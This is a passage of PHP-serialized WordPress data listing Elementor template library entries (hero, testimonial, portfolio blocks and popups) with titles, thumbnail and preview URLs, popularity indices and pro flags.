Fitness\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2019/01/slide_gym_small.png\";s:12:\"tmpl_created\";i:1547973928;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/slide-in-contact-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:513;s:11:\"trend_index\";i:449;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:84;a:14:{s:2:\"id\";i:6212;s:5:\"title\";s:11:\"Features 12\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_7.png\";s:12:\"tmpl_created\";i:1520443684;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/features-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:76;s:11:\"trend_index\";i:94;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:85;a:14:{s:2:\"id\";i:10675;s:5:\"title\";s:35:\"Full Screen | Login | Gym | Fitness\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/01/gym_full_small.png\";s:12:\"tmpl_created\";i:1547974110;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/popups/full-screen-login-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:498;s:11:\"trend_index\";i:421;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:86;a:14:{s:2:\"id\";i:6220;s:5:\"title\";s:10:\"Features 2\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_8.png\";s:12:\"tmpl_created\";i:1520443685;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:81;s:11:\"trend_index\";i:92;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:87;a:14:{s:2:\"id\";i:6230;s:5:\"title\";s:6:\"Hero 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_white_1.png\";s:12:\"tmpl_created\";i:1520443687;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:376;s:11:\"trend_index\";i:324;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:88;a:14:{s:2:\"id\";i:9719;s:5:\"title\";s:30:\"Classic | Subscribe | Register\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/01/register_small.png\";s:12:\"tmpl_created\";i:1547976107;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/popups/classic-subscribe-register/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:416;s:11:\"trend_index\";i:329;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:89;a:14:{s:2:\"id\";i:6239;s:5:\"title\";s:6:\"Hero 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_1.png\";s:12:\"tmpl_created\";i:1520443689;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:26;s:11:\"trend_index\";i:24;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:90;a:14:{s:2:\"id\";i:6249;s:5:\"title\";s:6:\"Hero 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_2.png\";s:12:\"tmpl_created\";i:1520443691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:55;s:11:\"trend_index\";i:29;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:91;a:14:{s:2:\"id\";i:6258;s:5:\"title\";s:6:\"Hero 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_3.png\";s:12:\"tmpl_created\";i:1520443693;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:419;s:11:\"trend_index\";i:581;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:92;a:14:{s:2:\"id\";i:10137;s:5:\"title\";s:34:\"Full Screen | Contact | Restaurant\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/rest_small.png\";s:12:\"tmpl_created\";i:1547976342;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/popups/full-screen-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:522;s:11:\"trend_index\";i:431;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:93;a:14:{s:2:\"id\";i:6266;s:5:\"title\";s:6:\"Hero 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_4.png\";s:12:\"tmpl_created\";i:1520443695;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:52;s:11:\"trend_index\";i:39;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:94;a:14:{s:2:\"id\";i:10244;s:5:\"title\";s:17:\"Bottom Bar | Sale\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/wow_small.png\";s:12:\"tmpl_created\";i:1547976402;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/popups/bottom-bar-sale/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:573;s:11:\"trend_index\";i:500;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:95;a:14:{s:2:\"id\";i:6274;s:5:\"title\";s:6:\"Hero 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_5.png\";s:12:\"tmpl_created\";i:1520443698;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:95;s:11:\"trend_index\";i:85;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:96;a:14:{s:2:\"id\";i:6017;s:5:\"title\";s:6:\"CTA 14\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_14.png\";s:12:\"tmpl_created\";i:1520520331;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/cta-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:151;s:11:\"trend_index\";i:135;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:97;a:14:{s:2:\"id\";i:10127;s:5:\"title\";s:35:\"Fly In | Announcement | Maintenance\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/pizza_small.png\";s:12:\"tmpl_created\";i:1547984061;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/popups/fly-in-announcement-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:628;s:11:\"trend_index\";i:635;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:98;a:14:{s:2:\"id\";i:4826;s:5:\"title\";s:14:\"Testimonial 24\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_1.png\";s:12:\"tmpl_created\";i:1520520544;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/testimonial-24-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:259;s:11:\"trend_index\";i:225;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:99;a:14:{s:2:\"id\";i:4835;s:5:\"title\";s:14:\"Testimonial 16\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_1.png\";s:12:\"tmpl_created\";i:1520520546;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-16/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:379;s:11:\"trend_index\";i:491;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:100;a:14:{s:2:\"id\";i:4843;s:5:\"title\";s:14:\"Testimonial 18\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_2.png\";s:12:\"tmpl_created\";i:1520520548;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-18/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:404;s:11:\"trend_index\";i:498;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:101;a:14:{s:2:\"id\";i:4854;s:5:\"title\";s:14:\"Testimonial 13\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_2.png\";s:12:\"tmpl_created\";i:1520520549;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:572;s:11:\"trend_index\";i:603;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:102;a:14:{s:2:\"id\";i:4863;s:5:\"title\";s:14:\"Testimonial 19\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_3.png\";s:12:\"tmpl_created\";i:1520520551;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-19/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:245;s:11:\"trend_index\";i:219;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:103;a:14:{s:2:\"id\";i:10776;s:5:\"title\";s:33:\"Fly In | Contact | Social | Share\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/01/social1_small.png\";s:12:\"tmpl_created\";i:1548047055;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/popups/fly-in-contact-social-share/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:630;s:11:\"trend_index\";i:661;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:104;a:14:{s:2:\"id\";i:4871;s:5:\"title\";s:14:\"Testimonial 12\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_3.png\";s:12:\"tmpl_created\";i:1520520552;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:242;s:11:\"trend_index\";i:373;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:105;a:14:{s:2:\"id\";i:10785;s:5:\"title\";s:33:\"Fly In | Contact | Social | Share\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/01/social2_small.png\";s:12:\"tmpl_created\";i:1548047593;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/popups/fly-in-contact-social-share-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:458;s:11:\"trend_index\";i:366;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:106;a:14:{s:2:\"id\";i:4880;s:5:\"title\";s:14:\"Testimonial 20\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/customers-1.jpg\";s:12:\"tmpl_created\";i:1520520554;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-20/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:393;s:11:\"trend_index\";i:430;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:107;a:14:{s:2:\"id\";i:4889;s:5:\"title\";s:14:\"Testimonial 11\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/customers-2.jpg\";s:12:\"tmpl_created\";i:1520520556;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:509;s:11:\"trend_index\";i:566;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:108;a:14:{s:2:\"id\";i:4897;s:5:\"title\";s:14:\"Testimonial 21\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_5.png\";s:12:\"tmpl_created\";i:1520520557;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-21/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:72;s:11:\"trend_index\";i:120;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:109;a:14:{s:2:\"id\";i:4905;s:5:\"title\";s:14:\"Testimonial 22\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_6.png\";s:12:\"tmpl_created\";i:1520520559;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-22/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:113;s:11:\"trend_index\";i:109;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:110;a:14:{s:2:\"id\";i:4913;s:5:\"title\";s:14:\"Testimonial 23\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_7.png\";s:12:\"tmpl_created\";i:1520520561;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-23/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:230;s:11:\"trend_index\";i:319;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:111;a:14:{s:2:\"id\";i:4921;s:5:\"title\";s:14:\"Testimonial 10\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_5.png\";s:12:\"tmpl_created\";i:1520520562;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:209;s:11:\"trend_index\";i:308;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:112;a:14:{s:2:\"id\";i:4929;s:5:\"title\";s:14:\"Testimonial 24\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_8.png\";s:12:\"tmpl_created\";i:1520520564;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-24/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:42;s:11:\"trend_index\";i:37;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:113;a:14:{s:2:\"id\";i:4939;s:5:\"title\";s:13:\"Testimonial 9\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_8.png\";s:12:\"tmpl_created\";i:1520520565;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/testimonial-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:90;s:11:\"trend_index\";i:112;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:114;a:14:{s:2:\"id\";i:4947;s:5:\"title\";s:14:\"Testimonial 27\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_9.png\";s:12:\"tmpl_created\";i:1520520567;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-27/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:192;s:11:\"trend_index\";i:381;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:115;a:14:{s:2:\"id\";i:4955;s:5:\"title\";s:14:\"Testimonial 29\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_9.png\";s:12:\"tmpl_created\";i:1520520569;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-29/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:342;s:11:\"trend_index\";i:489;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:116;a:14:{s:2:\"id\";i:4963;s:5:\"title\";s:14:\"Testimonial 25\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_10.png\";s:12:\"tmpl_created\";i:1520520570;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/testimonial-25-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:391;s:11:\"trend_index\";i:414;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:117;a:14:{s:2:\"id\";i:4971;s:5:\"title\";s:14:\"Testimonial 26\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_11.png\";s:12:\"tmpl_created\";i:1520520572;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-26/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:585;s:11:\"trend_index\";i:657;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:118;a:14:{s:2:\"id\";i:4979;s:5:\"title\";s:14:\"Testimonial 15\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_10.png\";s:12:\"tmpl_created\";i:1520520573;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-15/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:520;s:11:\"trend_index\";i:632;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:119;a:14:{s:2:\"id\";i:4987;s:5:\"title\";s:14:\"Testimonial 17\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_12-1.png\";s:12:\"tmpl_created\";i:1520520575;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-17/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:150;s:11:\"trend_index\";i:215;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:120;a:14:{s:2:\"id\";i:4995;s:5:\"title\";s:14:\"Testimonial 14\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_12.png\";s:12:\"tmpl_created\";i:1520520577;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:369;s:11:\"trend_index\";i:454;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:121;a:14:{s:2:\"id\";i:5007;s:5:\"title\";s:11:\"Portfolio 7\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_1.png\";s:12:\"tmpl_created\";i:1520520578;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/portfolio-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:41;s:11:\"trend_index\";i:25;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:122;a:14:{s:2:\"id\";i:5019;s:5:\"title\";s:11:\"Portfolio 1\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_black_1.png\";s:12:\"tmpl_created\";i:1520520580;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/portfolio-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:164;s:11:\"trend_index\";i:267;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:123;a:14:{s:2:\"id\";i:5027;s:5:\"title\";s:12:\"Portfolio 11\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_2.png\";s:12:\"tmpl_created\";i:1520520581;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/blocks/portfolio-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:299;s:11:\"trend_index\";i:316;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:124;a:14:{s:2:\"id\";i:10794;s:5:\"title\";s:34:\"Classic | Contact | Social | 